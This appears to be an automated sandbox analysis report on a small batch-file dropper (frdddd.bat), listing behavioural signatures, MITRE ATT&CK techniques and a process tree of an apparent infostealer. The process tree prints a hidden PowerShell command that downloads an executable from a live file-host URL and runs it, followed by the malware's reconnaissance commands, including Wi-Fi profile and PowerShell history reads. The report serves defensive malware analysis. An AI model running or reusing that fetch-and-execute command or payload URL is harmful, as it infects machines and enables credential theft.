Analysis
max time kernel: 929s
max time network: 828s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 26/07/2024, 17:48

Static task: static1

Behavioral task: behavioral1
  Sample: frdddd.bat
  Resource: win10-20240404-en

Behavioral task: behavioral2
  Sample: frdddd.bat
  Resource: win10v2004-20240709-en

Behavioral task: behavioral3
  Sample: frdddd.bat
  Resource: win11-20240709-en

General
Target: frdddd.bat
Size: 255B
MD5: 7cfc0e137d5d8b7f808add077083360b
SHA1: af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9
SHA256: 596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5
SHA512: 9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0
Malware Config
Signatures
Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
Malicious access to or copy of a web browser credential store.

Blocklisted process makes network request (1 IoCs)
flow  pid   Process
4     1272  powershell.exe

Command and Scripting Interpreter: PowerShell (3 IoCs)
pid   Process
1272  powershell.exe
1272  powershell.exe
3244  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoCs)
pid   Process
2964  services.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Adds Run key to start application (2 TTPs, 1 IoCs)
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "C:\\Users\\Admin\\AppData\\Local\\Temp\\services"
Process: services.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
58    ipinfo.io
49    ipinfo.io
51    ipinfo.io
57    ipinfo.io

Enumerates processes with tasklist (1 TTPs, 1 IoCs)
pid   Process
1268  tasklist.exe

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description           ioc                                                     Process
Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
Key opened            \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe
Key queried           \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  netsh.exe

Program crash (1 IoCs)
pid   pid_target  Process       procid_target
3344  2964        WerFault.exe  106

System Location Discovery: System Language Discovery (1 TTPs, 27 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid   Process
1204  cmd.exe
2336  PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery (1 TTPs, 2 IoCs)
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid   Process
3400  cmd.exe
2916  netsh.exe

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description: Key opened
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000
Process: taskmgr.exe

description: Key opened
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A
Process: taskmgr.exe

description: Key value queried
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName
Process: taskmgr.exe

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine the installed video card.
pid   Process
3064  WMIC.exe

Gathers system information (1 TTPs, 1 IoCs)
Runs systeminfo.exe.
pid   Process
3096  systeminfo.exe

Opens file in notepad (likely ransom note) (1 IoCs)
pid   Process
2196  NOTEPAD.EXE

Runs ping.exe (1 TTPs, 1 IoCs)
pid   Process
2336  PING.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid   Process
1388  taskmgr.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of FindShellTrayWindow (64 IoCs)
Suspicious use of SendNotifyMessage (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
  - Suspicious use of WriteProcessMemory
  PID: 2892

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1272

    C:\Users\Admin\AppData\Local\Temp\services.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\services.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 2964

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Suspicious use of WriteProcessMemory
        PID: 1204

        C:\Windows\SysWOW64\PING.EXE
          Command line: ping -n 1 1.1.1.1
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
          PID: 2336

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 1268

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic csproduct get uuid
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
          PID: 3540

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 3656

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic csproduct get uuid
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
          PID: 3364

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get name
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 2984

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic path win32_VideoController get name
          - System Location Discovery: System Language Discovery
          - Detects videocard installed
          PID: 3064

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c wmic cpu get name
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 1736

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic cpu get name
          - System Location Discovery: System Language Discovery
          PID: 4640

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c wmic os get Caption /value
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 3096

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic os get Caption /value
          - System Location Discovery: System Language Discovery
          PID: 1688

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get currentrefreshrate
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 5076

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic path win32_VideoController get currentrefreshrate
          - System Location Discovery: System Language Discovery
          PID: 3776

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell Get-Content (Get-PSReadlineOption).HistorySavePath
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 3520

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell Get-Content (Get-PSReadlineOption).HistorySavePath
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          PID: 3688

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c tasklist
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 544

        C:\Windows\SysWOW64\tasklist.exe
          Command line: tasklist
          - Enumerates processes with tasklist
          - System Location Discovery: System Language Discovery
          PID: 1268

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c systeminfo
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 920

        C:\Windows\SysWOW64\systeminfo.exe
          Command line: systeminfo
          - System Location Discovery: System Language Discovery
          - Gathers system information
          PID: 3096

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c netsh wlan show profile
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Wi-Fi Discovery
        PID: 3400

        C:\Windows\SysWOW64\netsh.exe
          Command line: netsh wlan show profile
          - Event Triggered Execution: Netsh Helper DLL
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Wi-Fi Discovery
          PID: 2916

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
        - System Location Discovery: System Language Discovery
        PID: 3828

        C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /value
          - System Location Discovery: System Language Discovery
          PID: 4264

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
        - System Location Discovery: System Language Discovery
        PID: 5112

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell.exe -Command "Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation"
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          PID: 3244

      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 1172
        - Program crash
        PID: 3344

C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 2136

C:\Windows\system32\BackgroundTransferHost.exe
  Command line: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  PID: 3776

C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x494 0x454
  PID: 3636

C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\1IWDmrphZKxrlSMC\Exceptions.txt
  - Opens file in notepad (likely ransom note)
  PID: 2196

C:\Windows\system32\taskmgr.exe
  Command line: "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID: 1388

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2964 -ip 2964
  PID: 2984
Network
MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)

Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)

Discovery
  Browser Information Discovery (1)
  Peripheral Device Discovery (1)
  Process Discovery (1)
  Query Registry (2)
  Remote System Discovery (1)
  System Information Discovery (3)
  System Location Discovery (1)
    System Language Discovery (1)
  System Network Configuration Discovery (2)
    Internet Connection Discovery (1)
    Wi-Fi Discovery (1)
Downloads